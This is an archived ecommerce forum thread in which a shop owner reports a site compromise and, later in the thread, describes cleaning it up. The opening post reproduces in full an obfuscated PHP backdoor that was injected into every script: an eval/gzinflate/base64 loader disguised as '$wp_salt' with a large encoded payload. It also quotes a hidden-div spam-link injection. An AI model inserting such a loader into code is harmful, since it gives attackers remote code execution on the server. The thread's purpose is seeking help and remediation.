Jump to content
Latest News: (loading..)

Archived

This topic is now archived and is closed to further replies.

spitlikethis

Site hack? $wp_salt = array

Recommended Posts

Hello

 

So, a few days ago I edited one of my item's descriptions and noticed the following had been added to EVERY item:

 

<style>#okgd {position:absolute;overflow:auto;height:0;width:0;}</style>

 

followed by a long list of links to sites in places like Russia.

 

I have implemented several of the suggested security changes on the forums and I am guessing one of these has fixed that problem as I can no longer see it! (I should point out that it didn't seem to affect how my site ran).

 

However, when I made the security changes, I noticed that every single one of my .php scripts had something similar to this

 

 

 

<?php

$md5 = "71f4d60cd528c299cdba7d684da9ed0c";

$wp_salt = array('f','_','e',";","6",'o',"r","d",'g','a',"i",'s',"b","l",'$',')','(',"c","n","t","v",'4','z');

$wp_add_filter = create_function('$'.'v',$wp_salt[2].$wp_salt[20].$wp_salt[9].$wp_salt[13].$wp_salt[16].$wp_salt[8].$wp_salt[22].$wp_salt[10].$wp_salt[18].$wp_salt[0].$wp_salt[13].$wp_salt[9].$wp_salt[19].$wp_salt[2].$wp_salt[16].$wp_salt[12].$wp_salt[9].$wp_salt[11].$wp_salt[2].$wp_salt[4].$wp_salt[21].$wp_salt[1].$wp_salt[7].$wp_salt[2].$wp_salt[17].$wp_salt[5].$wp_salt[7].$wp_salt[2].$wp_salt[16].$wp_salt[14].$wp_salt[20].$wp_salt[15].$wp_salt[15].$wp_salt[15].$wp_salt[3]);

$wp_add_filter('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');

?>

 

at the top.

 

My question is really this - do I need to now remove this script from all the .php files (as I have beefed up security)? They aren't pretty but, if they can't be "activated" now, I'd rather not have to!

 

If I DO have to, are there any handy tools to do this? I have Googled the problem and see that something similar occurs with Wordpress users and some helpful person has written a script to remove them - on Wordpress.

 

Thanks in advance.

 

Z

Share this post


Link to post
Share on other sites

OK, I'm going to answer my own question here!

 

I decided to try the script which is here http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html - I downloaded it, uploaded it to the root and then ran it. I have several sites running on one server and it went through them all - it was only the Oscommerce site infected but it removed all the malicious scripts and now my site is running super fast.

 

Please note, I am NOT a programmer or anything so I hope I have done the right thing. I have tried test orders etc and it all seems to be running as it should but use it at your own discretion.

 

Of course, if I encounter any probs, I will post them up here.

 

Z

Share this post


Link to post
Share on other sites

I suppose the $64 question would be is the Wordpress part of the site secure?

 

Judging from what you've posted I say it was the avenue of attack on the osC part of the site.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

Couldn't say for certain, Germ, they are on different parts of the server and my Wordpress sites are clear. Personally, I think it was via osC, but I have patched the holes up now so hope it will be OK!

Share this post


Link to post
Share on other sites

×